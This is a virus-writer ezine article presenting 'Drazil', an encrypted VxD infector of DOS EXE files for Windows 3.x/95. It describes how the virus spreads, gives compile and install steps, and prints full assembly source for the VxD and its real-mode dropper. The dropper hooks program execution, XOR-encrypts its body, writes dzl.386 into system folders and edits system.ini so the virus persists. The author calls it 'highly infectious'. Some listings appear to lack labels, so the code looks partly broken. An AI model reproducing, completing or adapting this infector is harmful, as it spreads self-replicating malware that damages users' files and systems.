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SLAM3.033: Encrypted vxd exe infector *Drazil* by Reptile

eZine's profile picture
Published in 
 · 26 Feb 2022

Comment @ Drazil by Reptile

This virus is an encrypted vxd exe infector.

The vxd (dzl.386) infects exe files (not ne/pe) on execution (4b00h) in the standard manner. It restores time/date/attribut (reset) of the victims and its size is 5142 bytes, coz you'll need the Windoze 3.11 DDK to compile it (argh!). But anyway Drazil increases hosts only :) by 2869 bytes (it doesn't store the 2778 bytes of zeros, which are created by masm). To mark a file as infected, the virus takes a random value (8 bit) and xors it with 255, then it writes this word to the offset at 12h of the exe header.

When an infected file is run, the encrypted (just a little so you can't see the conspicuous strings) real mode portion checks for the vxd and then jumps back to the host or if the vxd isn't found it places dzl.386 in the 'c:\windows\system', the 'c:\windows.000\system' or the 'c:\win95\system' directory and loads it in the system.ini. Then it shows 'Error: [Drazil] by Reptile' (payload) and terminates. After the next reboot the vxd is in memory and infects every executed exe file.

To install Drazil run the file infected.exe or copy the vxd to one of the three usable paths, then add manually the line 'device=dzl.386' to the [386Enh] section of the system.ini and do a reboot.

This virus should also work under Windoze 3.xx, but I'm not sure coz I couldn't test it.

If one of the three paths is available Drazil is *highly* infectious. When I tested it, my whole system was really fast infected. So use it with care! :)

Compiling dzl.386: (.386p code) 
masm5 -p -w2 dzl.asm
link386 dzl.obj,dzl.386,,,dzl.def
addhdr dzl.386

Compiling (.286 code)
tasm /m2 drazil.asm
tlink /t drazil.obj
file2db (or another db generator)
modify drazil.dat



Declare_Virtual_Device DZL, 1, 0, DZL_Control, Undefined_Device_Id, \

include ;realmode code
header db 512 dup (0)

BeginProc DZL_Device_Init
mov ax,3d02h ;open the vxd
lea edx,dropname1 ;in the 'c:\windows\system' dir
vxdint 21h
jnc short rd

mov ax,3d02h ;open the vxd
lea edx,dropname2 ;in the 'c:\windows.000\system' dir
vxdint 21h
jnc short rd

mov ax,3d02h ;open the vxd
lea edx,dropname3 ;in the 'c:\win95\system' dir
vxdint 21h
jc short e ;skip it

xchg ax,bx

mov ah,3fh ;store the first part of the vxd
mov cx,2342
lea edx,store
vxdint 21h
jc short e ;skip it

mov ah,3eh
vxdint 21h

mov eax,21h ;install int 21h handler
mov esi,offset32 int21h
VMMcall Hook_V86_Int_Chain
EndProc DZL_Device_Init

BeginProc int21h
cmp [ebp.Client_AX],4b00h ;exec call
jne prevhook

Push_Client_State ;save regs
VMMcall Begin_Nest_Exec

movzx edx,[ebp.Client_DS] ;get the name
shl edx,4
movzx eax,[ebp.Client_DX]
add edx,eax
add edx,[ebx.CB_High_Linear]

mov ax,4300h ;save attribut
vxdint 21h
push ecx

mov ax,4301h ;set normal attribut
mov cx,20h
vxdint 21h

mov ax,3d02h ;open file
vxdint 21h
jc exit
xchg ax,bx

push edx ;save the name
mov ax,5700h ;save time/date
vxdint 21h
push ecx
push edx

mov ah,3fh ;read header
mov cx,512
lea edx,header
vxdint 21h

cmp word ptr [header],'ZM' ;exe?
jne cfile
cmp word ptr [header + 0ch],0ffffh ;allocate all mem?
jne cfile
cmp word ptr [header + 18h],40h ;win exe?
je cfile
;don't infect
cmp word ptr [header + 40h],'9' ;german
je cfile
cmp word ptr [header + 40h],'2l' ;english
je cfile
mov al,[header + 12h] ;infected?
xor al,255
cmp byte ptr [header + 13h],al
je cfile

;save ss:sp
mov ax,word ptr [header + 0eh]
mov sseg,ax
mov ax,word ptr [header + 10h]
mov ssp,ax

;save cs:ip
mov eax,dword ptr [header + 14h]
mov csip,eax

mov ax,4202h ;eof
xor cx,cx
vxdint 21h

;calc new cs:ip
mov cx,16
div cx
sub ax,word ptr [header + 8]

mov word ptr [header + 14h],dx
mov word ptr [header + 16h],ax

add dx,vend ;calc stack

mov word ptr [header + 0eh],ax
mov word ptr [header + 10h],dx

;8 bit xor encryption
in al,40h
or al,al
je rdnm
mov byte ptr [encval],al ;save random value

mov edi,offset32 encstart
mov cx,encend - encstart

xor byte ptr [edi],al
inc edi
loop xl

;write virus
mov ah,40h
mov cx,vend - start
mov edx,offset32 start
vxdint 21h

mov al,[encval]
mov edi,offset32 encstart
mov cx,encend - encstart

xor byte ptr [edi],al
inc edi
loop xll

mov ax,4202h ;eof
xor cx,cx
vxdint 21h

mov cx,512 ;calc pages
div cx
or dx,dx
jz short np
inc ax
mov word ptr [header + 4],ax
mov word ptr [header + 2],dx

mov ax,4200h ;bof
xor cx,cx
vxdint 21h

in al,40h ;set infection flag
or al,al
je rnd
mov byte ptr [header + 12h],al
xor al,255
mov byte ptr [header + 13h],al

mov ah,40h ;write new header
mov cx,1dh
lea edx,header
vxdint 21h

mov ax,5701h ;restore time/date
pop edx
pop ecx
vxdint 21h

mov ah,3eh
vxdint 21h

pop edx ;restore name

mov ax,4301h ;restore attribut
pop ecx
vxdint 21h

VMMcall End_Nest_Exec

redwopdrazilcigamecin db '˙˘',7,'+**+',7,'˘˙'
EndProc int21h

BeginProc DZL_Control
Control_Dispatch Init_Complete,DZL_Device_Init
EndProc DZL_Control

BeginProc DZL_Real_Mode_Init
xor bx,bx
xor si,si
mov ax,Device_Load_Ok
EndProc DZL_Real_Mode_Init

≥ File: Drazil.asm ≥

;Drazil's real mode portion


.model tiny

org 100h
;get delta
call $ + 3
drazil:pop bp
sub bp,offset drazil

push ds ;coz psp
push cs
pop ds

;decrypt it
db 176 ;mov al
encval db 0

lea di,[bp + offset encstart]
mov cx,encend - encstart
xor byte ptr [di],al
inc di
loop xd

;get the windoze path
lea dx,[bp + offset sysini1]
call attr
mov ax,3d02h ;c:\windows\system.ini?
int 21h
jnc win

lea dx,[bp + offset sysini2]
call attr
mov ax,3d02h ;c:\windows.000\system.ini?
int 21h
jnc win000

lea dx,[bp + offset sysini3]
call attr
mov ax,3d02h ;c:\win95\system.ini?
int 21h
jc e

push ax ;save handle
mov ax,3d00h ;check if dzl.386 is already installed
lea dx,[bp + offset dropname3] ;c:\win95\system\dzl.386
int 21h
jc inst

;exe return
pop ax
;exit: jmp back to the victim
pop ax ;psp
add ax,10h
add word ptr [bp + offset csip + 2],ax

db 5 ;add ax
sseg dw 0fff0h ;test
mov ss,ax

db 0bch ;mov sp
ssp dw 0fffeh

db 0eah
csip dd 0fff00000h

push ax
mov ax,3d00h
lea dx,[bp + offset dropname1] ;c:\windows\system\dzl.386
int 21h
jc inst
jmp ee

push ax
mov ax,3d00h
lea dx,[bp + offset dropname2] ;c:\windows.000\system\dzl.386
int 21h
jnc ee

mov ah,3ch ;nope: install dzl.386
xor cx,cx
int 21h
xchg ax,bx

mov ah,40h ;write the first part of the vxd
mov cx,2342
lea dx,[bp + offset drop]
int 21h

;write the zeros (by masm) - masm sux!
mov cx,2778

push cx
mov ah,40h
mov cx,1
lea dx,[bp + rbuf]
int 21h
pop cx
loop lk

mov ah,40h ;write the end
mov cx,22
lea dx,[bp + offset ddb] ;this is the end...
int 21h

mov ah,3eh
int 21h

;load the vxd in the system.ini
pop bx ;handle

push cs
pop es

mov ax,4202h ;get file size
xor cx,cx
int 21h
push ax

mov ax,4200h ;bof
xor cx,cx
int 21h

mov ah,3fh ;search the [386Enh] section
mov cx,1
lea dx,[bp + offset rbuf]
int 21h
or ax,ax
je cd
cmp [bp + rbuf],'n' ;[386E'n'h]
jne cd

mov ah,3fh ;really?
mov cx,2
lea dx,[bp + offset rbuf]
int 21h
cmp word ptr [bp + rbuf],']h'
jne cd

mov ax,4201h ;save current offset
xor cx,cx
int 21h
pop cx
push ax

sub cx,ax ;read the second part of the file
mov ah,3fh
lea dx,[bp + offset rbuf]
int 21h

mov ax,4200h ;go back
pop dx
push cx
xor cx,cx
int 21h

mov ah,40h ;insert 'device=dzl.386'
mov cx,16
lea dx,[bp + offset dropstring]
int 21h

mov ah,40h ;write the second part of the file
pop cx
lea dx,[bp + offset rbuf]
int 21h

mov ah,3eh
int 21h

mov ah,09h ;I'm a Lizard
lea dx,[bp + offset error]
int 21h

mov ah,4ch
int 21h

attr proc near
mov ax,4301h ;change attribut
mov cx,20h
int 21h
attr endp

error db 'Error: [Drazil] by Reptile$'
dropstring db 13,10,'device=dzl.386'
ddb db '3€3ˆ∏',0,0,'√',0,0,0,7,'DZL_DDB',1,0,0
rbuf db 0 ;readbuffer
dropname3 db 'c:\win95\system\dzl.386',0
dropname2 db 'c:\windows.000\system\dzl.386',0
dropname1 db 'c:\windows\system\dzl.386',0
sysini3 db 'c:\win95\system.ini',0
sysini2 db 'c:\windows.000\system.ini',0
sysini1 db 'c:\windows\system.ini',0
drop db 2342 dup (?)
end start

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